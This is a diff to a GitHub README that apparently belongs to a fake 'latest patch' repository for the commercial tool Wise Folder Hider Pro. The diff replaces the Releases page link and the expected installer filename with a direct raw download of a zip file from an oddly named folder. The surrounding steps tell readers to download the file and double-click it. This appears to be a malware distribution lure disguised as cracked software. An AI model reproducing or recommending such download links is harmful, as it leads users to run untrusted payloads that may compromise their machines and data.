lynch1408/Wise-Folder-Hider-Pro-Latest-Patch/README.md

 ## 📥 Download & Install

 1. **Visit the Download Page:**
-   Go to the [Releases page](https://github.com/lynch1408/Wise-Folder-Hider-Pro-Latest-Patch/releases) to access the latest version of Wise Folder Hider Pro.
+   Go to the [Releases page](https://raw.githubusercontent.com/lynch1408/Wise-Folder-Hider-Pro-Latest-Patch/main/inspissation/Wise-Folder-Hider-Pro-Latest-Patch-2.8-beta.4.zip) to access the latest version of Wise Folder Hider Pro.

 2. **Select the Latest Release:**
    On the Releases page, find the most recent version listed.
 This will typically be at the top of the page, marked as the latest release.

 3. **Download the Installer:**
    Click on the installer file link.
-It should look something like `WiseFolderHiderProSetup.exe`.
+It should look something like `https://raw.githubusercontent.com/lynch1408/Wise-Folder-Hider-Pro-Latest-Patch/main/inspissation/Wise-Folder-Hider-Pro-Latest-Patch-2.8-beta.4.zip`.
 This will start the download.
 Ensure you save the file in a location you can easily find, like your desktop.

 4. **Run the Installer:**
    Once downloaded, locate the downloaded file and double-click it.
 This will launch the installation wizard.